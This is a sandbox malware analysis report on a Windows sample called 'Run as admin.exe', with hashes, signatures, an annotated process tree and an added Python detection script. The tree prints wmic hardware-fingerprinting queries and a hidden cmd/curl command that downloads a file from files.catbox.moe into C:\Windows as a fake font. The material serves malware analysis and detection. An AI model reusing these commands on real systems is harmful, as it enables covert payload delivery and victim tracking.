Analysis
max time kernel: 427s
max time network: 1149s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 28/09/2024, 22:50
Static task: static1
Behavioral task: behavioral1
Sample: Run as admin.exe
Resource: win11-20240802-en
General
Target: Run as admin.exe
Size: 296KB
MD5: b1c0c309a7574b24abfc2ec22fe879e8
SHA1: b2bde1e54c9d15717a4ac692e82461c979a1e895
SHA256: 364fef83527cf425daeda9afbd77ea5466a90ab6de41d55dcb2d750c8cb34247
SHA512: c008b82a4e8e31db5dac9b37b0bac38b96fc275eed2ca8748ee3c6cd57a0a916d772a04f9e49d7376c030498a3ceaf3f03418a00c53762b2b95ee38251a7451d
SSDEEP: 3072:nCH7/661TBPYw5weLegNrpJNxUmudrE3XRsR6FF5oXUELgeDXY6NHWw7iiowBAjU:p6TnSevJXulEHYmFmFXB7iignNbpX
Malware Config
Signatures
Drops file in Windows directory (1 IoC)
  description: File created
  ioc: \??\c:\Windows\fortnite.ttf
  Process: curl.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid: 3096
  Process: Run as admin.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  The 64 listed entries are all Token: <privilege> enabled by the two wmic.exe children, in the same fixed order each time:
  PID 3840 wmic.exe, two full passes (42 entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 5740 wmic.exe, one full pass of the same 21 privileges followed by a second SeIncreaseQuotaPrivilege (22 entries); the listing stops there at 64 entries.
  Note: the unnamed entries 33, 34, 35 and 36 are the privilege LUIDs of SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. Enabling every privilege present in its token in this order is what wmic.exe itself does at startup, so this signature is an artifact of the wmic.exe children; the sample's own process (PID 3096) does not appear in the list, and nothing here shows the sample manipulating its own token.
Suspicious use of WriteProcessMemory (14 IoCs)
  description | pid | Process | procid_target
  PID 3096 wrote to memory of 3840 | 3096 | Run as admin.exe | 79 (listed twice)
  PID 3096 wrote to memory of 5740 | 3096 | Run as admin.exe | 82 (listed twice)
  PID 3096 wrote to memory of 5272 | 3096 | Run as admin.exe | 84 (listed twice)
  PID 3096 wrote to memory of 2136 | 3096 | Run as admin.exe | 86 (listed twice)
  PID 3096 wrote to memory of 720 | 3096 | Run as admin.exe | 88 (listed twice)
  PID 3096 wrote to memory of 5472 | 3096 | Run as admin.exe | 90 (listed twice)
  PID 5472 wrote to memory of 4412 | 5472 | cmd.exe | 91 (listed twice)
  Note: every target is a process that the writer itself spawned in the process tree below (the five wmic.exe children, cmd.exe, and cmd.exe's curl.exe child). A parent writing into a child it has just created is the normal behaviour of CreateProcess, not injection into a foreign process; this signature only confirms the parent-child links.
Processes
1. "C:\Users\Admin\AppData\Local\Temp\Run as admin.exe"   PID 3096
   Signatures: Suspicious behavior: GetForegroundWindowSpam; Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\Wbem\wmic.exe   wmic baseboard get serialnumber   PID 3840
      Signatures: Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\System32\Wbem\wmic.exe   wmic cpu get processorid   PID 5740
      Signatures: Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\System32\Wbem\wmic.exe   wmic csproduct get uuid   PID 5272
   2. C:\Windows\System32\Wbem\wmic.exe   wmic path win32_computersystemproduct get uuid   PID 2136
   2. C:\Windows\System32\Wbem\wmic.exe   wmic path Win32_NetworkAdapter where "PNPDeviceID like '%%PCI%%' AND NetConnectionStatus = 2 AND AdapterTypeID = '0'" get MacAddress   PID 720
   2. C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf >nul 2>&1   PID 5472
      Signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\curl.exe   curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf   PID 4412
         Signatures: Drops file in Windows directory

Read as a chain: the sample first collects stable hardware identifiers (baseboard serial number, CPU ProcessorId, the system UUID queried two ways, and the MAC address of the connected PCI Ethernet adapter), which is the usual input for a hardware ID used for licensing, victim tracking or sandbox checks. It then uses the curl.exe that ships with Windows, via cmd.exe with output suppressed, to fetch a file from files.catbox.moe and write it to c:\Windows\fortnite.ttf. Writing into C:\Windows needs an elevated token, which matches the sample's name; the report does not show what the downloaded file is or whether it is used afterwards.
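The two-stage behaviour in the tree above, as detection logic. This is an added example, not code from the report or the sample: it replays process-creation records constructed from the report's process tree (the pid/ppid/image/cmd fields are an assumed simplification of Sysmon Event ID 1) and flags a process tree that runs several hardware-identifier wmic queries and then has curl write into the Windows directory. The query patterns and the threshold of three queries are the author's choices, not values from the report.

```python
"""Added example (not from the sandbox report): triage process-creation records
for the chain seen above, HWID fingerprinting via wmic followed by a curl
download into C:\\Windows."""
import re
from collections import defaultdict

# Constructed from the report's process tree; Sysmon-style field names assumed.
EVENTS = [
    {"pid": 3096, "ppid": 1, "image": r"C:\Users\Admin\AppData\Local\Temp\Run as admin.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\Run as admin.exe"'},
    {"pid": 3840, "ppid": 3096, "image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmd": "wmic baseboard get serialnumber"},
    {"pid": 5740, "ppid": 3096, "image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmd": "wmic cpu get processorid"},
    {"pid": 5272, "ppid": 3096, "image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmd": "wmic csproduct get uuid"},
    {"pid": 2136, "ppid": 3096, "image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmd": "wmic path win32_computersystemproduct get uuid"},
    {"pid": 720, "ppid": 3096, "image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmd": "wmic path Win32_NetworkAdapter where \"PNPDeviceID like '%%PCI%%' "
            "AND NetConnectionStatus = 2 AND AdapterTypeID = '0'\" get MacAddress"},
    {"pid": 5472, "ppid": 3096, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r"C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/u0u5nj.ttf "
            r"--output c:\Windows\fortnite.ttf >nul 2>&1"},
    {"pid": 4412, "ppid": 5472, "image": r"C:\Windows\system32\curl.exe",
     "cmd": r"curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf"},
]

# wmic queries that return stable hardware identifiers (the set seen in the report)
HWID_QUERY = re.compile(
    r"wmic\s+(baseboard\s+get\s+serialnumber|cpu\s+get\s+processorid"
    r"|csproduct\s+get\s+uuid|path\s+win32_computersystemproduct\s+get\s+uuid"
    r"|path\s+win32_networkadapter\b.*\bget\s+macaddress)",
    re.IGNORECASE,
)
# curl told to write its output somewhere under the Windows directory
WINDIR_DOWNLOAD = re.compile(
    r"\bcurl\b.*\s(?:-o|--output)\s+\"?([a-z]:\\windows\\[^\s\"]+)", re.IGNORECASE)


def root_ancestor(pid, parent_of, known):
    """Walk ppid links up to the topmost process present in the event set."""
    while parent_of.get(pid) in known:
        pid = parent_of[pid]
    return pid


def triage(events, min_hwid_queries=3):
    """Return {root_pid: findings} for every process tree that fingerprints
    hardware and/or drops a file into the Windows directory through curl."""
    parent_of = {e["pid"]: e["ppid"] for e in events}
    known = set(parent_of)
    hwid = defaultdict(list)   # root pid -> pids of HWID wmic queries
    drops = defaultdict(list)  # root pid -> paths written under C:\Windows
    for e in events:
        root = root_ancestor(e["pid"], parent_of, known)
        image = e["image"].lower()
        if image.endswith("\\wmic.exe") and HWID_QUERY.search(e["cmd"]):
            hwid[root].append(e["pid"])
        m = WINDIR_DOWNLOAD.search(e["cmd"])
        # count the curl.exe process itself, not the cmd.exe wrapper carrying the same text
        if m and image.endswith("\\curl.exe"):
            drops[root].append(m.group(1))
    findings = {}
    for root in set(hwid) | set(drops):
        f = {"hwid_queries": len(hwid[root]),
             "windir_drops": sorted(set(drops[root]))}
        f["fingerprinting"] = f["hwid_queries"] >= min_hwid_queries
        f["severity"] = "high" if f["fingerprinting"] and f["windir_drops"] else "medium"
        findings[root] = f
    return findings


if __name__ == "__main__":
    for root, f in triage(EVENTS).items():
        print(f"root PID {root}: {f}")
```

Run against the constructed records the sample's tree (root PID 3096) scores five HWID queries plus one drop under C:\Windows and is rated high; a tree with a single wmic query and no drop stays at medium, which is the right place for a benign inventory script to land. Attributing each event to its topmost ancestor is what lets the curl.exe grandchild count against the sample rather than against cmd.exe.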
Network
MITRE ATT&CK Matrix
Downloads
Filesize: 232KB
MD5: c8c8dd1acb9d39ef7fee4c9adb696b5d
SHA1: d011763990b860412fe38afd314654fdb79d5c21
SHA256: 6e2c63af95e794943ff8f2a57dcfc62195693c244a6ec977361475a0368a6786
SHA512: db5dc4e536ef08ee05231860bd4ed40a9373282c00e42397e80b9e42fd98012337852bd5b0b1058ff2913c9de516722ae86d56b30a523bd25d5f22f4d005cc7c